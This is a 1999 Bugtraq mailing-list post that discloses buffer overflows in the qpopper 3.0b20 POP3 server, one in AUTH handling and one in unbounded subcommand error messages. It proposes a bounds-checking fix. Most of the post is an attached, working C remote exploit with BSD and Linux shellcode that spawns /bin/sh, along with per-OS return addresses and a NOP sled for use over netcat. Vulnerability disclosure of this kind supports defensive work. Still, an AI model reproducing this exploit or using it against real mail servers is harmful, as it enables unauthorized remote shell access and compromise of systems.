[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    qpop3.0b20 and below - notes and exploit
From:       Lucid Solutions <lucid () TERRA ! NEBULA ! ORG>
Date:       1999-11-30 20:25:25
[Download RAW message or body]

I found this overflow myself earlier this month.  Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vunlnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.

	There is also another overflow besides the AUTH overflow which can
occur if a valid username and password are first entered also occuring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
    pop_msg(p,POP_FAILURE,
            "Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);

No bounds checking is done on the attempted subcommand.  It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
    pop_msg(p,POP_FAILURE,
            "Unknown command: \"%.128s %.128s\".",p->pop_command,
		p->pop_subcommand);


I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.

As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (althought that's good practice too).

Attached is my original exploit that works on *BSD and Linux.  (Solaris is
NOT vulnerable to the AUTH overflow).  Slight modification is needed on
one line as the comments say.  This exploit will actually work on the
majority of machines then.  Qualcomm: you have already received my working
exploit with no modification needed.

Let's hope for an official patch soon.


						- sk8@lucid-solutions.com
						http://www.lucid-solutions.com
						

["q3combo-public.c" (TEXT/PLAIN)]

/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
 * combination *BSD and Linux
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 *
 * I have written this to test and demonstrate vulnerabilities on clients' 
 * systems only.  
 *
 * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
 * (at least not until Qualcomm issues a patch)
 * 
 * You may only use this to test your own system(s).
 * I am not responsible for any unauthorized use of this program.
 *
 * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux 
 * 
 * Since popper is usually compiled by the admin, return addresses will vary,
 * but I have included common values.  You may have to provide an offset
 * to get it to work on your system.
 * 
 * I wrote the exploit near the beginning of November 1999, and unlike some 
 * other exploits I've seen since, this one works even on Linux boxes on which 
 * inetd was not started from a shell prompt.
 *
 * One minor change must be made for this to exploit the AUTH overflow.
 *
 * Usage: If you can't figure out how to use this, you shouldn't
 * 	  be in the security business.  (try netcat)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

unsigned int NOP=0x90;

unsigned long offset=0; /* default offset */

char bsdsc[]=
	"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
	"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
	"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
	"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
	"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
	"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

char linuxsc[]=
	"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
	"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
	"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
	"\xff\xff/bin/sh";

struct version {
	int num;
	char* systype;
	int buffer_length;
	long address;
};

struct version verlist[] = {
	{0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c},
	{1, "BSDI 4.x", 1001, 0x8047564},
	{2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
	{3, "Linux", 990, 0xbfffd304},
	{0, 0, 0, 0}
};

int main(int argc, char** argv) {
	char* buffer, *shellcode;
	int buflen, i=0, ver, retaddr, align=0;
	struct sockaddr_in sockaddr;
	struct hostent* host;

	if (argc < 2) {
		printf("Usage: %s version [offset]\n", argv[0]);
		i=-1;
		printf("\nAvailable versions:\n");
		while (verlist[++i].systype)  {
		  printf("   %d: %s\n", verlist[i].num, verlist[i].systype);
		}
		printf("\n");
		exit(-1);
	}

	ver=atoi(argv[1]);
	if (argc > 2) {
		offset=atoi(argv[2]);
	}
	if (strstr(verlist[ver].systype, "Linux")) {
		shellcode=linuxsc;
		align=2;
	}
	else shellcode=bsdsc;

	buflen=verlist[ver].buffer_length;
	retaddr=verlist[ver].address;

	buffer=(char*)malloc(buflen);
	memset(buffer, NOP, buflen); 
	memcpy(buffer, "AUTH ", 4);
	memcpy(buffer+800, shellcode, strlen(shellcode));
	for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) {
		*((unsigned long int *)&buffer[i])=retaddr+offset;
	}
	buffer[buflen-2]='\n';
	buffer[buflen-1]='\n';

	printf("%s\n", buffer);
}


[prev in list] [next in list] [prev in thread] [next in thread]